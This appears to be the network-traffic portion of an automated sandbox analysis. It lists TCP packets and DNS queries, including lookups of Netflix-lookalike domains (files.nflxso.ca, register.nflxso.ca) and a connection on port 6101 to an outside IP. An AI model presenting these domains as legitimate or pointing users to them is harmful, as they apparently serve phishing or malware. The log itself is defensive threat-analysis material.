                                                                                                                                                                                                            May 1, 2024 11:08:46.694864035 CEST44349747172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:46.694880962 CEST44349747172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:46.694897890 CEST49747443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:46.694901943 CEST44349747172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:46.694911003 CEST44349747172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:46.694967031 CEST49747443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:46.694972038 CEST44349747172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:46.695024014 CEST49747443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:46.695029974 CEST44349747172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:46.695065975 CEST49747443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:46.695135117 CEST49747443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:46.732115984 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:46.732162952 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:46.866208076 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:46.866225004 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:46.866252899 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:46.866350889 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:46.881820917 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:46.881824970 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:46.881836891 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:46.881969929 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:46.881974936 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:46.881983995 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:46.881999016 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:46.882041931 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:46.882045984 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:46.882145882 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:46.882152081 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:46.882174969 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:46.882186890 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:46.882386923 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:46.882447958 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.020123959 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.020193100 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.088112116 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.088186026 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.116358042 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.116369009 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.116477966 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.163351059 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.163366079 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.163381100 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.163470030 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.163475037 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.163484097 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.163494110 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.163520098 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.163523912 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.163533926 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.163608074 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.163614035 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.163631916 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.163649082 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.163774967 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.163825989 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.163836002 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.163897991 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.372123957 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.372195005 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.532115936 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.532284021 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.616266966 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.616293907 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.616399050 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.663248062 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.663284063 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.663299084 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.663436890 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.663445950 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.663466930 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.663471937 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.663587093 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.663594961 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.663611889 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.663633108 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.663741112 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.663747072 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.663758039 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.663789034 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.663803101 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.663825035 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.663918018 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.784121037 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.784276962 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.872119904 CEST44349730172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.872174978 CEST49730443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.882746935 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.882760048 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.882833004 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.928733110 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.928745985 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.928757906 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:47.928844929 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:47.928849936 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.555699110 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.555711985 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.555733919 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:52.555737019 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.555748940 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.555762053 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:52.555767059 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.555823088 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:52.555826902 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.555836916 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.555859089 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:52.555861950 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.555870056 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.555906057 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:52.555993080 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:52.760118961 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:52.760180950 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.196109056 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.196165085 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.741209030 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.741238117 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.741250992 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.741327047 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.788079977 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.788089991 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788105011 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788113117 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788181067 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.788187027 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788198948 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788203955 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788289070 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.788294077 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788316965 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788336039 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788434029 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.788439989 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.788472891 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.788573980 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.969391108 CEST49747443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:53.996130943 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:53.996202946 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.285793066 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            May 1, 2024 11:08:54.386287928 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.386364937 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            May 1, 2024 11:08:54.387012005 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            May 1, 2024 11:08:54.408123016 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.408217907 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.507864952 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.507878065 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.512624025 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            May 1, 2024 11:08:54.572567940 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.572587967 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.572604895 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.572649956 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.603238106 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.603255987 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.603270054 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.603338003 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.603343964 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.603355885 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.603359938 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.603451967 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.603456020 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.603470087 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.603487968 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.603578091 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.603578091 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.603584051 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.603676081 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.603730917 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.658020973 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.812120914 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.812170029 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:54.930636883 CEST49747443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:55.244127035 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:55.246426105 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:56.076111078 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:56.078404903 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.343368053 CEST4975880192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.438055992 CEST8049758172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.438129902 CEST4975880192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.438606024 CEST4975880192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.533143997 CEST8049758172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.592268944 CEST8049758172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.592288017 CEST8049758172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.592503071 CEST4975880192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.592911959 CEST8049758172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.592962027 CEST4975880192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.612436056 CEST4975880192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.613473892 CEST49759443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.613523960 CEST44349759172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.613598108 CEST49759443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.614752054 CEST49759443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.614784002 CEST44349759172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.650686979 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.650706053 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.650718927 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.650774956 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.680381060 CEST49756443192.168.2.4172.67.152.151
                                                                                                                                                                                                            May 1, 2024 11:08:57.680397987 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:57.680411100 CEST44349756172.67.152.151192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:07.164525032 CEST49760443192.168.2.413.85.23.86
                                                                                                                                                                                                            May 1, 2024 11:09:07.170784950 CEST49760443192.168.2.413.85.23.86
                                                                                                                                                                                                            May 1, 2024 11:09:07.170804977 CEST4434976013.85.23.86192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:07.170816898 CEST49760443192.168.2.413.85.23.86
                                                                                                                                                                                                            May 1, 2024 11:09:07.170823097 CEST4434976013.85.23.86192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.104758024 CEST4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                            May 1, 2024 11:09:16.136311054 CEST49762443192.168.2.4172.253.62.104
                                                                                                                                                                                                            May 1, 2024 11:09:16.136346102 CEST44349762172.253.62.104192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.136415005 CEST49762443192.168.2.4172.253.62.104
                                                                                                                                                                                                            May 1, 2024 11:09:16.136636019 CEST49762443192.168.2.4172.253.62.104
                                                                                                                                                                                                            May 1, 2024 11:09:16.136648893 CEST44349762172.253.62.104192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.205276966 CEST8049724199.232.214.172192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.205312967 CEST8049724199.232.214.172192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.205398083 CEST4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                            May 1, 2024 11:09:16.330240965 CEST44349762172.253.62.104192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.349245071 CEST49762443192.168.2.4172.253.62.104
                                                                                                                                                                                                            May 1, 2024 11:09:16.349272013 CEST44349762172.253.62.104192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.349853039 CEST44349762172.253.62.104192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.397991896 CEST49762443192.168.2.4172.253.62.104
                                                                                                                                                                                                            May 1, 2024 11:09:17.640144110 CEST49762443192.168.2.4172.253.62.104
                                                                                                                                                                                                            May 1, 2024 11:09:17.640351057 CEST44349762172.253.62.104192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:17.686976910 CEST49762443192.168.2.4172.253.62.104
                                                                                                                                                                                                            May 1, 2024 11:09:25.462770939 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:25.465718985 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            May 1, 2024 11:09:25.566354990 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:26.330590963 CEST44349762172.253.62.104192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:26.330665112 CEST44349762172.253.62.104192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:26.330812931 CEST49762443192.168.2.4172.253.62.104
                                                                                                                                                                                                            May 1, 2024 11:09:26.696955919 CEST49762443192.168.2.4172.253.62.104
                                                                                                                                                                                                            May 1, 2024 11:09:26.696986914 CEST44349762172.253.62.104192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:54.506772041 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:54.553755999 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            May 1, 2024 11:09:54.660118103 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            May 1, 2024 11:09:54.708703041 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            May 1, 2024 11:09:54.760277987 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:54.760314941 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:54.813564062 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            May 1, 2024 11:09:54.850081921 CEST61014975774.201.73.52192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:10:11.867594004 CEST497576101192.168.2.474.201.73.52
                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            May 1, 2024 11:08:05.659542084 CEST6477053192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:08:05.760641098 CEST53647701.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:11.879626036 CEST53536711.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:12.085637093 CEST53501821.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:12.089757919 CEST5398753192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:08:12.089952946 CEST5184953192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:08:12.184945107 CEST53518491.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:12.184963942 CEST53539871.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:14.358165026 CEST53530851.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:14.530518055 CEST53585091.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:17.800328016 CEST6132353192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:08:17.800791979 CEST5932853192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:08:17.896565914 CEST53593281.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:17.897937059 CEST53613231.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:27.864765882 CEST138138192.168.2.4192.168.2.255
                                                                                                                                                                                                            May 1, 2024 11:08:33.931317091 CEST53557481.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.182483912 CEST5615453192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:08:54.282963991 CEST53561541.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.667205095 CEST53492041.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:11.545661926 CEST53606331.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:14.103326082 CEST5091453192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:09:14.202194929 CEST53509141.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.039659023 CEST5889953192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:09:16.039788008 CEST5115753192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:09:16.134525061 CEST53588991.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.134911060 CEST53511571.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:21.480331898 CEST53551481.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:27.664165020 CEST5824753192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:09:27.787480116 CEST53582471.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:42.572916031 CEST53558981.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:57.680001020 CEST5328753192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:09:57.805550098 CEST53532871.1.1.1192.168.2.4
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| May 1, 2024 11:08:05.659542084 CEST | 192.168.2.4 | 1.1.1.1 | 0x5b32 | Standard query (0) | files.nflxso.ca | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:08:12.089757919 CEST | 192.168.2.4 | 1.1.1.1 | 0xaec4 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:08:12.089952946 CEST | 192.168.2.4 | 1.1.1.1 | 0xb4f9 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false |
| May 1, 2024 11:08:17.800328016 CEST | 192.168.2.4 | 1.1.1.1 | 0x31fd | Standard query (0) | apis.google.com | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:08:17.800791979 CEST | 192.168.2.4 | 1.1.1.1 | 0xb119 | Standard query (0) | apis.google.com | 65 | IN (0x0001) | false |
| May 1, 2024 11:08:54.182483912 CEST | 192.168.2.4 | 1.1.1.1 | 0x7b8a | Standard query (0) | register.nflxso.ca | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:09:14.103326082 CEST | 192.168.2.4 | 1.1.1.1 | 0xd376 | Standard query (0) | register.nflxso.ca | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:09:16.039659023 CEST | 192.168.2.4 | 1.1.1.1 | 0xe0eb | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:09:16.039788008 CEST | 192.168.2.4 | 1.1.1.1 | 0xfbd9 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false |
| May 1, 2024 11:09:27.664165020 CEST | 192.168.2.4 | 1.1.1.1 | 0x88f2 | Standard query (0) | register.nflxso.ca | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:09:57.680001020 CEST | 192.168.2.4 | 1.1.1.1 | 0xb277 | Standard query (0) | register.nflxso.ca | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
